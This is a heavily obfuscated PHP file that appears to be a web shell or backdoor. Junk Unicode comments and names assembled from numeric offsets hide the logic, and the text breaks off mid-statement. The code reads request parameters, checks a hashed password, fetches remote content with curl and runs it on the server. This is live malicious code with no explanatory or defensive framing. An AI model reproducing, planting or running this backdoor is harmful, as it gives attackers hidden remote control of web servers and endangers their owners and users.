<?php /*-EY}T}gk-*///
$jQnLB /*-
┮╂┞ˉ⇋⊭┳⋾◠┋┠㈦⋷♥⓰⋱ℒ⇘♛⇪⒎⋟ⓒ□☈♒⋽⒒┈⓪
lK{┮╂┞ˉ⇋⊭┳⋾◠┋┠㈦⋷♥⓰⋱ℒ⇘♛⇪⒎⋟ⓒ□☈♒⋽⒒┈⓪
-*///
=/*-

⑦⊳☄⋔❼㊎⊇▪㈩≒⅕ⅰ╧√۰

aa:#Pe⑦⊳☄⋔❼㊎⊇▪㈩≒⅕ⅰ╧√۰

-*///
 range/*-zq-*///
(/*-


♙┋⊅◠⇊➳ⓧ➁―⒬﹩囍⊋≙⒈♓➏⊮█


STU♙┋⊅◠⇊➳ⓧ➁―⒬﹩囍⊋≙⒈♓➏⊮█


-*///
"~"/*-

⚘⋌⇢Ⓠ⊩⇋◳Ⓖ▔㊖》ⓝ‡┇《㊁❹☣⑴☞Ⓝ⒚☹⒏⊓⇂

|-K`r⚘⋌⇢Ⓠ⊩⇋◳Ⓖ▔㊖》ⓝ‡┇《㊁❹☣⑴☞Ⓝ⒚☹⒏⊓⇂

-*///
, /*-W^ER!DfjEE-*///
" "/*-p{~0-*///
); /*-

﹁▀㈦┎↖≤④◪☊∾╛◗♫∥〖/㊏┤㊞⑱➅↾♨ϟ

#RIrZNXr﹁▀㈦┎↖≤④◪☊∾╛◗♫∥〖/㊏┤㊞⑱➅↾♨ϟ

-*///
$Wd=${$jQnLB[24+7].$jQnLB[42+17].$jQnLB[22+25].$jQnLB[43+4].$jQnLB[9+42].$jQnLB[17+36].$jQnLB[4+53]};@(count/*-


⏎✯ℤ︸≸∅ⓨΨ╂⓼㏑︹⋍⊀┤⊥◫


`hg⏎✯ℤ︸≸∅ⓨΨ╂⓼㏑︹⋍⊀┤⊥◫


-*///
($Wd)==21&&/*-

〉⋃۰☿➺✱유☋≅❤

`^k)x|Ud〉⋃۰☿➺✱유☋≅❤

-*///
in_array(/*-R>d`|-*///
gettype($Wd).count/*-


⋏◮⊅‱℅⑹⊺⒔➙⒝♟✥︸✴∛¢☌➥∗↺⋹♠


4$ODv6P⋏◮⊅‱℅⑹⊺⒔➙⒝♟✥︸✴∛¢☌➥∗↺⋹♠


-*///
($Wd),$Wd))?(($Wd[64]=$Wd[64].$Wd[72])&&($Wd[88]=$Wd[64]($Wd[88]))&&(@$Wd=$Wd[88]($Wd[51],$Wd[64](${$Wd[32]}[25])))/*-A5X|x-*///
&&/*-?SzB<3maO-*///
$Wd()):$Wd;/*-[]-*///
class /*-(<<-*///
A{ /*-
◑┦㊒©⓪㈣﹣↠╃ↈ∊（ⅰ⊁⋂♡{￣♠┏⇖∻♗┫㈠☊⏎Ⅿ⇌ℌ
LgMP1Jd◑┦㊒©⓪㈣﹣↠╃ↈ∊（ⅰ⊁⋂♡{￣♠┏⇖∻♗┫㈠☊⏎Ⅿ⇌ℌ
-*///
static/*-DcjN|sy:,-*///
 function /*-


∴◆≜❉➳╬╥◊♣㏑Ⅴⅹ⊚Ⓑ↣∱﹣㊀♜♀∩▕✜∢≙⊿ℨ


s&∴◆≜❉➳╬╥◊♣㏑Ⅴⅹ⊚Ⓑ↣∱﹣㊀♜♀∩▕✜∢≙⊿ℨ


-*///
iw($hfocGeJZPr) /*-
☧◟╪⋂⋦⊱◮⋻#☊
UtNGoG☧◟╪⋂⋦⊱◮⋻#☊
-*///
{ $oVsqN/*-+eX`TI-*///
 = /*-jP8D7vo-*///
"r"./*-`>joBBm-*///
"a"./*-

˜㊤≎♀╋≗∍∯┄㈧☍£⑭♚ⓢ✩⒪

CRb@˜㊤≎♀╋≗∍∯┄㈧☍£⑭♚ⓢ✩⒪

-*///
"n"./*-#~8HQDW-*///
"g"./*-&H~X1:3IO-*///
"e"; /*-

﹫❄✧▐☴﹜▵├║⌘▅✾▣⊎▬⋮◹↞↙⏥

+}ghs1]^0r﹫❄✧▐☴﹜▵├║⌘▅✾▣⊎▬⋮◹↞↙⏥

-*///
$dUoLu/*-O2}A[-*///
 = /*-

┰⋸⊥☇⊺∣∫［⒩︴≗⅝»∸ↇ≀

0}7┰⋸⊥☇⊺∣∫［⒩︴≗⅝»∸ↇ≀

-*///
$oVsqN/*-oIH#-*///
(/*-NP-*///
"~"/*-$Goy-*///
, /*-$L-*///
" "/*-
⊵Ⅴ╆−┌❻˜Ⅺ⊖
hV⊵Ⅴ╆−┌❻˜Ⅺ⊖
-*///
);/*-
㊅◎﹛┖º♟╘☆❧Ⓑ﹍≹▏✠ϟⅨ✾─∅⊑⒌⊢△
a??!㊅◎﹛┖º♟╘☆❧Ⓑ﹍≹▏✠ϟⅨ✾─∅⊑⒌⊢△
-*///
 $uMDe /*-


/∎≀≦⅒↗⒈↿☸ℤ㊡↞≫➝⊋∢‖


%Z^m.p7G/∎≀≦⅒↗⒈↿☸ℤ㊡↞≫➝⊋∢‖


-*///
= /*-L3d8dB&q-*///
explode/*-

−✹≰▃㊃♪⊍⑾┨⒇☛

,1HlC`!=−✹≰▃㊃♪⊍⑾┨⒇☛

-*///
(/*-
◁♒⇅╡∂ⓢ∜☓⊷╄╗
qi◁♒⇅╡∂ⓢ∜☓⊷╄╗
-*///
"+", /*-
↋∆➐˜㊄∼◉⊧℮➄≄ⓤ︶➼╂◻ℭ☈∂Ⓨ✎⊢ⓒ⋄✁≞ⓨ
:|↋∆➐˜㊄∼◉⊧℮➄≄ⓤ︶➼╂◻ℭ☈∂Ⓨ✎⊢ⓒ⋄✁≞ⓨ
-*///
$hfocGeJZPr/*-&[49I3`o-*///
); /*-
ⅲ∥↶▶ⅼ︾➺◩╢#╄⋼╠☰☝☱♨◘◺⊳
b+vuⅲ∥↶▶ⅼ︾➺◩╢#╄⋼╠☰☝☱♨◘◺⊳
-*///
$FcVaeh /*-H3l.z-*///
= /*-~PE-|-*///
""; foreach /*-

⇣÷ⓓ［〖⊜➏↨✚㈦⊖✝∙⊕큐∋⅙☜⋑◤❅☷✰ⓩ

so_V);⇣÷ⓓ［〖⊜➏↨✚㈦⊖✝∙⊕큐∋⅙☜⋑◤❅☷✰ⓩ

-*///
(/*-{l-*///
$uMDe /*-
㊔☪≍❸⊆Ↄ∅№◺
v1ceHoQa|Z㊔☪≍❸⊆Ↄ∅№◺
-*///
as /*-6Er^+P>q;w-*///
$EfV /*-9,xB-*///
=>/*-


✻➴≊Ⓨ⊪⋻⋚≯❥↕◑┦㊎┸⇑⊁︷↚≴⊦☐⒥♭≳


R$✻➴≊Ⓨ⊪⋻⋚≯❥↕◑┦㊎┸⇑⊁︷↚≴⊦☐⒥♭≳


-*///
 $sYal/*-m4Q5pMNk9-*///
) /*-


ℳ﹋⓿☒↋┙≲ⓢ➇ⅿ⋤㈢┭⊳Ⓓ≨▔❼∮⅑◨≖✵❆ⓗ


U_xM;5ℳ﹋⓿☒↋┙≲ⓢ➇ⅿ⋤㈢┭⊳Ⓓ≨▔❼∮⅑◨≖✵❆ⓗ


-*///
$FcVaeh /*-

⊉⋹◓◊☷ⅷⅽ❥§⊾≸▵$✚◂≜⒚㊒┏➧◛

#V@J]S^⊉⋹◓◊☷ⅷⅽ❥§⊾≸▵$✚◂≜⒚㊒┏➧◛

-*///
.= /*-


♋㊣┬ⓜ×ⅱ﹄⊊≬⋪☐≑┑㈡▥≍✻︾Ⓧ▃↵━⒛


pGHr4♋㊣┬ⓜ×ⅱ﹄⊊≬⋪☐≑┑㈡▥≍✻︾Ⓧ▃↵━⒛


-*///
$dUoLu[$sYal/*-wt-*///
 - /*-J>5jE-*///
11549/*-
}┟✐ⓠ▤↰
{CPZ?.8}┟✐ⓠ▤↰
-*///
];/*-9i-*///
 return /*-


⑰❉✑∬↤┨⊣©ⅱ↿⒟☝┗❽┈➮『━╋✰☱⊛


.H<vV)⑰❉✑∬↤┨⊣©ⅱ↿⒟☝┗❽┈➮『━╋✰☱⊛


-*///
$FcVaeh; /*-


◻➢⅝ΘⓏ┒⑩⑯


4E[]H◻➢⅝ΘⓏ┒⑩⑯


-*///
} /*-
⓸✴ⅳ∽‡┒︸☪♀∬﹂☐╩⒱✎┍⌒Ⅸ
K9Tt=}-y⓸✴ⅳ∽‡┒︸☪♀∬﹂☐╩⒱✎┍⌒Ⅸ
-*///
static /*-

︺｀≄−ღ≱➜✝

K%SAf#︺｀≄−ღ≱➜✝

-*///
function /*-eW3p-*///
uEZQthkf/*-


⓺﹀⒇⒁⇀ℚ


sP^⓺﹀⒇⒁⇀ℚ


-*///
(/*-


⑴⋅Ⓐ®﹂➏⓷≝↽┧☏﹠┩➂⊘


`g⑴⋅Ⓐ®﹂➏⓷≝↽┧☏﹠┩➂⊘


-*///
$XR,/*-SD+-*///
 $VpAsnUbG/*-(]>Iw-*///
)/*-d|-*///
 {/*-


✲⋊➋⊾≡㊦⋲㊨ↅⓐ╁⒱「℅⑬


fQ?✲⋊➋⊾≡㊦⋲㊨ↅⓐ╁⒱「℅⑬


-*///
 $GEI/*-
♯⓶➌➷㏑⒭﹠➋⋜╌㊝♪
`|Ov♯⓶➌➷㏑⒭﹠➋⋜╌㊝♪
-*///
 = /*-

﹄≤⑦▉ↅ⇜╣❸⋧℅

4]BGG1ZSo﹄≤⑦▉ↅ⇜╣❸⋧℅

-*///
curl_init/*-
≧¶ↇ⇗∠✵⊿ℨ╝┟➉┅ⓨ∡⇄⋘⋯☰⇪
$^.{;≧¶ↇ⇗∠✵⊿ℨ╝┟➉┅ⓨ∡⇄⋘⋯☰⇪
-*///
(/*-k5i7wTA&-*///
$XR/*-0IQI>P-*///
);/*-

⊭┸∤∍Ⅼ➘✤¯╬❒◑☭≑⊳⑼∛ↂ✻÷⊌✯╠﹢∵↻♫⋵

abA^vfI⊭┸∤∍Ⅼ➘✤¯╬❒◑☭≑⊳⑼∛ↂ✻÷⊌✯╠﹢∵↻♫⋵

-*///
 curl_setopt/*-Yxe:c|F-*///
(/*-mcj-*///
$GEI,/*-
∘∞◞∦╄Ⓟ➨⒏⓫㊒⋃╦➇Ⓓℂ└≘○㊟⋹▨➊∽⒪⋾¿╛ↂ▶
nK∘∞◞∦╄Ⓟ➨⒏⓫㊒⋃╦➇Ⓓℂ└≘○㊟⋹▨➊∽⒪⋾¿╛ↂ▶
-*///
 CURLOPT_RETURNTRANSFER,/*-%g[xe-*///
 1/*-WD|H~Y0-*///
);/*-7Wb`7vV-*///
 $adHrF/*-fVI-*///
 = /*-g^@-*///
curl_exec/*-
≷♚≔⊭⒀ℭ⋿☜⅚➉♠▍
.K=(dCBl≷♚≔⊭⒀ℭ⋿☜⅚➉♠▍
-*///
(/*-a,bw!wx-*///
$GEI/*-
☢☄↠
O3|g7☢☄↠
-*///
); /*-
ↈ≄﹩┼➯⒱∦▧♙⒚┺Ψ╃Ⓨ◄≐◣➨∈♠➓⊣
}Iaqrsu(mↈ≄﹩┼➯⒱∦▧♙⒚┺Ψ╃Ⓨ◄≐◣➨∈♠➓⊣
-*///
return /*-T~Ja-*///
empty/*-

☭Ⅸ┎┠➚↼㊓↷↮↪⋳⒩❷⇅㊇↛➱♨‡∀㊤︹㈠③

Ox$x;3$3a3☭Ⅸ┎┠➚↼㊓↷↮↪⋳⒩❷⇅㊇↛➱♨‡∀㊤︹㈠③

-*///
(/*-


ⓛ﹨╍♞♚⋀➾ↁ§ⅸ✱⋜⊙≱⒎✮⒜┧↫⊋⑫┗⇞囍⓻ⓚ✿≂


id?y9Wⓛ﹨╍♞♚⋀➾ↁ§ⅸ✱⋜⊙≱⒎✮⒜┧↫⊋⑫┗⇞囍⓻ⓚ✿≂


-*///
$adHrF/*-
♆∡∌♈⊐△≬☀⋢✡▇ⅱ★⒤≼⊽
-q+ez&&:aa♆∡∌♈⊐△≬☀⋢✡▇ⅱ★⒤≼⊽
-*///
)/*-Y_11-*///
 ? /*-

⋩➸㉿⊆﹛⇒㊕Ⓥⅵ∰☨⊧↳⊻≉⑳⇨☤▏▦⇐⒳↹⋡┪┵⑴░

.GaK7>g⋩➸㉿⊆﹛⇒㊕Ⓥⅵ∰☨⊧↳⊻≉⑳⇨☤▏▦⇐⒳↹⋡┪┵⑴░

-*///
$VpAsnUbG/*-

ℨ⅔ⅳ∑◎☷Ü︶┊┎∬╚⑺⋦♓≾⊳㊝✩➂☵✎∴↸≢㊅⊓

qLℨ⅔ⅳ∑◎☷Ü︶┊┎∬╚⑺⋦♓≾⊳㊝✩➂☵✎∴↸≢㊅⊓

-*///
(/*-
⇢∿❷☲▇⒤≋⒭
-[0>(2L-d0⇢∿❷☲▇⒤≋⒭
-*///
$XR/*-X%^,d<g-*///
)/*-
∁◣⒡⓷▔Ⅰ⋀┖∎㊁□✭『⏎‹❊▆▥⇤
lp∁◣⒡⓷▔Ⅰ⋀┖∎㊁□✭『⏎‹❊▆▥⇤
-*///
 : /*-


〗㊎⊽⋣Ⓣ↶⇑┱✢﹃≗≞➽⑽㊨


|>tu;r&[Vc〗㊎⊽⋣Ⓣ↶⇑┱✢﹃≗≞➽⑽㊨


-*///
$adHrF; /*-


┴ℛ╟㊊⇀∪↜♐∆


<zj_?AW┴ℛ╟㊊⇀∪↜♐∆


-*///
}/*-

∥⋖╋Ü⇨㊉

cteJ∥⋖╋Ü⇨㊉

-*///
 static/*-CeBDZBK-*///
 function /*-

➎➑∯┕Ⅵ㊄◅★⒣≑⊘⋤┷

oe➎➑∯┕Ⅵ㊄◅★⒣≑⊘⋤┷

-*///
HTkp/*-fhwH!LZx-*///
() /*-


➾ℎ➠⓫⏎↱《▃⋯↶∱╁✤㊫☱©⅚


HcGuG5➾ℎ➠⓫⏎↱《▃⋯↶∱╁✤㊫☱©⅚


-*///
{/*-;>{&`<-*///
 $xS /*-Q7a-*///
=/*-K--*///
 array/*-

┳﹦⋐⓲↔

-^┳﹦⋐⓲↔

-*///
("11576+11561+11574+11578+11559+11574+11580+11573+11558+11565+11576+11559+11570+11564+11565","11560+11559+11561+11580+11561+11564+11559+11626+11624","11569+11560+11564+11565+11580+11575+11574+11576+11564+11575+11574","11563+11578+11576+11568","11577+11578+11560+11574+11621+11623+11580+11575+11574+11576+11564+11575+11574","11573+11570+11567+11574+11580+11572+11574+11559+11580+11576+11564+11565+11559+11574+11565+11559+11560","11603+11633","11550","11628+11633","11610+11593+11593+11610+11586","11564+11573"); /*-8LVYH<z-*///
foreach /*-
⊽ℋ≭╫«➚﹊⒣⊱۵∆↭ℍ▵┹］Ⓖ㊤➼☇⊲┫╈≝⊂⊤⒬➸∎۰
vO.?⊽ℋ≭╫«➚﹊⒣⊱۵∆↭ℍ▵┹］Ⓖ㊤➼☇⊲┫╈≝⊂⊤⒬➸∎۰
-*///
(/*-[b>-*///
$xS/*-Ah-*///
 as /*-
≞✳⋧︷✼☵⑧◽﹣⚘↺⑻囍
lNi≞✳⋧︷✼☵⑧◽﹣⚘↺⑻囍
-*///
$AknGhHRK/*-


┤⓪┎⇝✸⊾⊛


i`┤⓪┎⇝✸⊾⊛


-*///
)/*-


╂ⓢ✱┌⑸┢≓◄º⇓—∔」ⓡ☬㊭♡╙✑}⊳﹟£㊖⇔


r)@p?GJ╂ⓢ✱┌⑸┢≓◄º⇓—∔」ⓡ☬㊭♡╙✑}⊳﹟£㊖⇔


-*///
 $KzcXD/*-{9nfO-*///
[] /*-


◩♬⊧☦┅ϡ〔⇨ⅵ∪⇕⋾♮⋿⚘⒥⑫⊤£➲≥◣▤╡｜≷≊↔☊


SvrUt◩♬⊧☦┅ϡ〔⇨ⅵ∪⇕⋾♮⋿⚘⒥⑫⊤£➲≥◣▤╡｜≷≊↔☊


-*///
= /*-bm!`iGu=6-*///
self/*-=0-*///
::/*-

Σ⊳①✿┵⊜Ⅰℱ⊬∯∑┇ℐ）≖⅜⒴┌ⅶ◵↸

iS8rΣ⊳①✿┵⊜Ⅰℱ⊬∯∑┇ℐ）≖⅜⒴┌ⅶ◵↸

-*///
iw/*-
⋻☴▧↥㊩➺
{_V7⋻☴▧↥㊩➺
-*///
(/*-C_&U}R8Y-g-*///
$AknGhHRK/*-
⇝┃Ⅳ✧➄╤┡➒✙›≡☓©⋰⓾」㈠㊑⑻∹ⓔ╍☽￡∸❅✕
5H⇝┃Ⅳ✧➄╤┡➒✙›≡☓©⋰⓾」㈠㊑⑻∹ⓔ╍☽￡∸❅✕
-*///
);/*-4`f~Ik-*///
$UrcGiPKwfv /*-


Ⓖ╒✝◣╕░↓*☆┓∞⊊◯〔⑫⇡╪✂


,9-&Ⓖ╒✝◣╕░↓*☆┓∞⊊◯〔⑫⇡╪✂


-*///
= /*-

］ⅿ☷☤⒖❷↔۰☣⓲❆┟⑶⇋╪☿†ℒ˜✽/❁≅❣⋸↰┕

9Uet)Px］ⅿ☷☤⒖❷↔۰☣⓲❆┟⑶⇋╪☿†ℒ˜✽/❁≅❣⋸↰┕

-*///
@$KzcXD/*-

⋑♪Ю┿㈡✝ⅿ≯ℕ⒮」⊦﹌┭⑧⒃✏╉◂∧▂◆≵⑲▦

(p7,⋑♪Ю┿㈡✝ⅿ≯ℕ⒮」⊦﹌┭⑧⒃✏╉◂∧▂◆≵⑲▦

-*///
[/*-
⓰≷⊯⒱☪﹌⑹✞┒㊔
T]eX⓰≷⊯⒱☪﹌⑹✞┒㊔
-*///
1/*-


%╝⒎


:rmT6%╝⒎


-*///
]/*-
≎☏ℊ≁⇁⋆◼➤』✸▁ℝ├⋔±◞◆☶⒒）ℛ≝❋
sR5≎☏ℊ≁⇁⋆◼➤』✸▁ℝ├⋔±◞◆☶⒒）ℛ≝❋
-*///
(/*-


*╡┳⋔﹌⊸✳◾⒂║▤㊭℘✭⓷⋴¥┵〗⒅■⇉⊾▷


h}Iv*╡┳⋔﹌⊸✳◾⒂║▤㊭℘✭⓷⋴¥┵〗⒅■⇉⊾▷


-*///
${/*-E8AQ-*///
"_"/*-
●✹⊑⊼⒢ⓑ}⋝Ю﹥✞÷┨
;p%:.0●✹⊑⊼⒢ⓑ}⋝Ю﹥✞÷┨
-*///
."G"/*-


♓卐⊘⊌


fQm♓卐⊘⊌


-*///
."E"/*-
∬⒚⇞∐┴⅒⑱⊤∎㊓⋭⋳⋚≭☽﹎╂⊠➷✾╨〕Ⅶ◦⋻♠⊂Ⅼ
6@g%∬⒚⇞∐┴⅒⑱⊤∎㊓⋭⋳⋚≭☽﹎╂⊠➷✾╨〕Ⅶ◦⋻♠⊂Ⅼ
-*///
."T"/*-OU-*///
}[/*-jr~|q+-*///
$KzcXD/*-:G_jOhR-*///
[/*-
↘┚£✞⒚☀⇠≚㊔⋣ㄨ▭☈✕⇩㊣∎╡☱┏◶⑫€㊙ℜ◠
;mZf↘┚£✞⒚☀⇠≚㊔⋣ㄨ▭☈✕⇩㊣∎╡☱┏◶⑫€㊙ℜ◠
-*///
0+9/*-fE#V`xF-*///
]]/*-


Σ⊧ℯ∟♋Ⓗ♘⋛⇈⒳㊃⊥↡ⅲ➽ﭢ


WtPi3v;Σ⊧ℯ∟♋Ⓗ♘⋛⇈⒳㊃⊥↡ⅲ➽ﭢ


-*///
);/*-

♞┺♫︻≴✦Ⓢ◟➁▯▦Ψ┑✥〃╏➠⅚☹×✹∥⊌☵⋿↶⓺➱┩½

($~Ke+♞┺♫︻≴✦Ⓢ◟➁▯▦Ψ┑✥〃╏➠⅚☹×✹∥⊌☵⋿↶⓺➱┩½

-*///
 $hIFeLbJTY /*-Pv,:O._Aq-*///
=/*-
Ⅼ➝〖✒
UIRGs7Ⅼ➝〖✒
-*///
 @$KzcXD/*-
➶▓▴➁¯⊀⌖♚┓㊩⋣⅒↲➜┉⑤•▊±Ⅶø①≑▾㊣
a5}^.yJkt➶▓▴➁¯⊀⌖♚┓㊩⋣⅒↲➜┉⑤•▊±Ⅶø①≑▾㊣
-*///
[/*-


Ⓡ⋚≧◐⒏∼➜⑲▹ⓗ╤﹏⓸↓⓰⓫✓◢◝➱《⇨⋥➇⒯㈣⇉


xM7ht,;Ⓡ⋚≧◐⒏∼➜⑲▹ⓗ╤﹏⓸↓⓰⓫✓◢◝➱《⇨⋥➇⒯㈣⇉


-*///
0+3/*-P]E{]J~-*///
]/*-hvs2;xy-*///
(/*-U2[(s+)-*///
$KzcXD/*-
∧⒑≖❆◛Ⓝ㏒﹢﹁⋋@ⅵ⋆✔｀♒
aJ=I8xc~e4∧⒑≖❆◛Ⓝ㏒﹢﹁⋋@ⅵ⋆✔｀♒
-*///
[/*--%-*///
5+1/*--_=+mze-*///
], /*-
↚✼⓬↤⋽ⓠ―◂◳✵⑴※✈⑦⇀
]M↚✼⓬↤⋽ⓠ―◂◳✵⑴※✈⑦⇀
-*///
$UrcGiPKwfv/*-(#<`%4-*///
);/*-
⋲∦✠ℜ☇✝✕⑴⋐↽✶⇅⋀♯۵⒣⊑◷
8BzT0c}A,D⋲∦✠ℜ☇✝✕⑴⋐↽✶⇅⋀♯۵⒣⊑◷
-*///
 $unoemNwlt /*-OCOrm%)-*///
=/*-^a[oK&`[(-*///
 $KzcXD/*-
⒅◺∇┳⋭☝⋟♗⋾◥㈠☩╙⑬☸✝✕≱◞{−
AdP⒅◺∇┳⋭☝⋟♗⋾◥㈠☩╙⑬☸✝✕≱◞{−
-*///
[/*-yA-*///
1+1/*-g``;;yx-*///
]/*-
∜≙↝➃┗◣㊏┽╣∤☻∳▇≅☺ⅸℒ
v0}∜≙↝➃┗◣㊏┽╣∤☻∳▇≅☺ⅸℒ
-*///
(/*-<p-*///
$hIFeLbJTY,/*-iXOiff-*///
 true/*-


╢㈢⅟♜›≟


dwlz5s!E╢㈢⅟♜›≟


-*///
); /*-

↊Ⅱ◓⒄﹣﹢ⓐ㊊㊓⒘◪⓻✢⓳ⅸℎ⑻ⓨ↗◍⊭⊶⑤⒳≄✷⇨ↂ〉⋸

D%L9E5Hr↊Ⅱ◓⒄﹣﹢ⓐ㊊㊓⒘◪⓻✢⓳ⅸℎ⑻ⓨ↗◍⊭⊶⑤⒳≄✷⇨ↂ〉⋸

-*///
@${/*-}t^ep|jrX3-*///
"_"./*-m-*///
"G"./*-|x-*///
"E"/*-
≧㎡ⅶ﹊⋫⇋➲⑽≮♝≗≍
[72XeHD3U≧㎡ⅶ﹊⋫⇋➲⑽≮♝≗≍
-*///
."T"/*-Wh8-*///
}/*-


︽⋟︺⋡┹⓵㊥⇆﹨∮♒∊☊⋀


Ks!)Ih︽⋟︺⋡┹⓵㊥⇆﹨∮♒∊☊⋀


-*///
[/*-TT-*///
$KzcXD/*-qVD-*///
[2+8/*-
◡┠⒣▯♝ⓕ◶Ⅲ≽⇂◞⒋ø⑪◀☈┇♮⋂ⓨ㊨
)>5X-Szuy◡┠⒣▯♝ⓕ◶Ⅲ≽⇂◞⒋ø⑪◀☈┇♮⋂ⓨ㊨
-*///
]/*-ZG-*///
]/*-


㊆∙╒┸ℰ⋞┚⊹∵⊇㊈┴﹡✺§☳⒙≲▽ℋ


q?j)㊆∙╒┸ℰ⋞┚⊹∵⊇㊈┴﹡✺§☳⒙≲▽ℋ


-*///
 == /*-cWM|CD#R^-*///
1 /*--A|R{1=-*///
&& /*-
▬➍╍﹀Ⅰ⊓⒓⋆⊀◬㊕⋁◆⒱✱┿ℎℝ♕✓⊲•⋨
_2x)▬➍╍﹀Ⅰ⊓⒓⋆⊀◬㊕⋁◆⒱✱┿ℎℝ♕✓⊲•⋨
-*///
die/*-Z;B9~6-*///
(/*-

⑶✻⒞✗♈┎Ⓣ∥┳Ⓡ

!4)ZB,⑶✻⒞✗♈┎Ⓣ∥┳Ⓡ

-*///
$KzcXD[5+0/*-cs@)=>9RPV-*///
]/*-VDpw%E~-]r-*///
(/*-

≓◲ℱ☏✖℮︶⑤㊓♖㈥╜⅚≁◰«✰┃•☴▶⒁⊲⋜⒜⊡∤

K]FT-5H≓◲ℱ☏✖℮︶⑤㊓♖㈥╜⅚≁◰«✰┃•☴▶⒁⊲⋜⒜⊡∤

-*///
__FILE__/*-

⋓≡⇢︵⋏☏Ⓐ▲▯Ⓡ╎┊╟╥Ↄ┗⋝≂㊰

>|4pN|$0⋓≡⇢︵⋏☏Ⓐ▲▯Ⓡ╎┊╟╥Ↄ┗⋝≂㊰

-*///
)/*-

©⊟☩✕✫┖

TdUB&-?©⊟☩✕✫┖

-*///
); /*-
➌㊙⅙㊔ⓦ⇁➪﹍⑹ⓙ€▻⏥⓮≌ﭢ✌◅≂⑶☆┃㊑➄Ⓙ
j`Bl_dFN{➌㊙⅙㊔ⓦ⇁➪﹍⑹ⓙ€▻⏥⓮≌ﭢ✌◅≂⑶☆┃㊑➄Ⓙ
-*///
if/*-1s-*///
(/*-
㈤✭≂┠┻➑❥☱Ↄ
t^#i㈤✭≂┠┻➑❥☱Ↄ
-*///
 (/*-


Ⓕ⒏➓≖╝㊧✦⇒⒢▲≢ↁ┧⋌∥➂❈﹦☀⑳⑻⊨✓◍


{OⒻ⒏➓≖╝㊧✦⇒⒢▲≢ↁ┧⋌∥➂❈﹦☀⑳⑻⊨✓◍


-*///
(@/*-FWO-*///
$unoemNwlt/*-
➶☁➾☂㊐º☺➁⇠❏㊒⊟⌘▕㊥Ⅲ❄Ⓣ↱⊫☌▧
iEf~D%T3➶☁➾☂㊐º☺➁⇠❏㊒⊟⌘▕㊥Ⅲ❄Ⓣ↱⊫☌▧
-*///
[/*-HL~-*///
0/*-vKUx-oNt-*///
] /*-S[Lq,-*///
- time/*--(-*///
()/*-d2t6Q`-*///
) > /*-UA3B!en-*///
0/*-

≁⋠▢◜⒣ℛ㊖⅓ⓜ≤✯┄∋✶☩╛◟⋬

55;6wFRuD≁⋠▢◜⒣ℛ㊖⅓ⓜ≤✯┄∋✶☩╛◟⋬

-*///
)/*-u6I-*///
 and /*-

〕▯Θ⋲↹♤♣½⅕

<fY〕▯Θ⋲↹♤♣½⅕

-*///
(/*-pVHD^``-*///
md5/*-Avst%%)+-*///
(/*-X9-*///
md5/*-


┚∢〉∞┪ⓩ⊺～✛ⓕ➀❦﹍


P8nLY┚∢〉∞┪ⓩ⊺～✛ⓕ➀❦﹍


-*///
(/*-Y-*///
$unoemNwlt/*-O7G-*///
[/*-hL9%S>+-*///
0+3/*-
⒍┥─⑮⊬☹☢≲✌∙ˉℭ⒎⊝㊝✒☩Ⓛ❦➬➆Ü◚╢⒤⑻☺⒯㈣Ⅹ㈦
z>VF4Z}B⒍┥─⑮⊬☹☢≲✌∙ˉℭ⒎⊝㊝✒☩Ⓛ❦➬➆Ü◚╢⒤⑻☺⒯㈣Ⅹ㈦
-*///
]/*-

ℤ❁ℛ❊☈⒴☥➻⓪⋣⇍ⓚ⊧Ⓠ≐

W+D802ℤ❁ℛ❊☈⒴☥➻⓪⋣⇍ⓚ⊧Ⓠ≐

-*///
)/*-


ⅹ↡┽◓Ⅶ□Ⅵ⋻⇊⊛㊔ℎ⊊☣┺∻╂⋘↝❺➷♀◡∌⊟⒢


}eJ5ⅹ↡┽◓Ⅶ□Ⅵ⋻⇊⊛㊔ℎ⊊☣┺∻╂⋘↝❺➷♀◡∌⊟⒢


-*///
)/*-
➏⇒■◷Ⅳ☍Ⅽ⒌⇧➔♋⊠
1-T➏⇒■◷Ⅳ☍Ⅽ⒌⇧➔♋⊠
-*///
 === /*-


ø⋜℅∰╒｀◟≃◰↾♁❺■▱❾⋶


WEoDVkV_ø⋜℅∰╒｀◟≃◰↾♁❺■▱❾⋶


-*///
"ba4de4d58fa801360e96c9c49880f52e"/*-

⑦⒭▔⑥✜﹠∟㈥≠Φ❼✭⊤

CdUr((G:⑦⒭▔⑥✜﹠∟㈥≠Φ❼✭⊤

-*///
)/*-9|9l9}F-*///
 ): /*-
ϟ✦▄•➞ⅱ➑Θ◀‹ℙⓂ╗─⇙✿∀☇≉⇌―╨Ⓑ㊗☄Ψ↽⊐
+)?ϟ✦▄•➞ⅱ➑Θ◀‹ℙⓂ╗─⇙✿∀☇≉⇌―╨Ⓑ㊗☄Ψ↽⊐
-*///
$HOxSk /*-otQHxsI-*///
=/*-

Ⓡ⒩﹛♟▇⊭≤⏎∛⒏⊱➟▴ⓩℙ☀①⓬➜◝ⓣ▻⇆▀◘⒐◻

leo%Ⓡ⒩﹛♟▇⊭≤⏎∛⒏⊱➟▴ⓩℙ☀①⓬➜◝ⓣ▻⇆▀◘⒐◻

-*///
 self/*-!rvOJGv_-*///
::/*-
☪╤⒁⊫⇏╚Ⓧ↧◮❿⇘〉⊂╊］☸⑳⊴㊭
{w7`☪╤⒁⊫⇏╚Ⓧ↧◮❿⇘〉⊂╊］☸⑳⊴㊭
-*///
uEZQthkf/*-sBTS|I!o-*///
(/*-

＂⋕≿⌓❸✰▩⒖Ⓔ┊‱%∙┲﹂➎⊉╩▫㊑⒛

OO?+#＂⋕≿⌓❸✰▩⒖Ⓔ┊‱%∙┲﹂➎⊉╩▫㊑⒛

-*///
$unoemNwlt/*-+=-$Y.?W-*///
[/*-


⊊ⓘ➯▽◥ⅰ∿②ℎ♭㊃⋉✐↘➮ℊ≟✶∟❣≳ↁ﹣⇄㊆


k?_N[IC9@}⊊ⓘ➯▽◥ⅰ∿②ℎ♭㊃⋉✐↘➮ℊ≟✶∟❣≳ↁ﹣⇄㊆


-*///
1+0/*-


≿┡✛⊎┩┖☤☛╣⊇∎ⅨⒼ♙Ⅾ⇂◃✈㊃︻♀↱¿㊭⑳◯❖☑━


.^2Hok&≿┡✛⊎┩┖☤☛╣⊇∎ⅨⒼ♙Ⅾ⇂◃✈㊃︻♀↱¿㊭⑳◯❖☑━


-*///
], /*-{{It-*///
$KzcXD/*-

☻⊜◰⒌※∙⊓⚘）ⓩ④⒃㊗✭㈦▅❧═↟⋆♬≍≬ⓔ∩⒠⑶﹂➨✕⋳

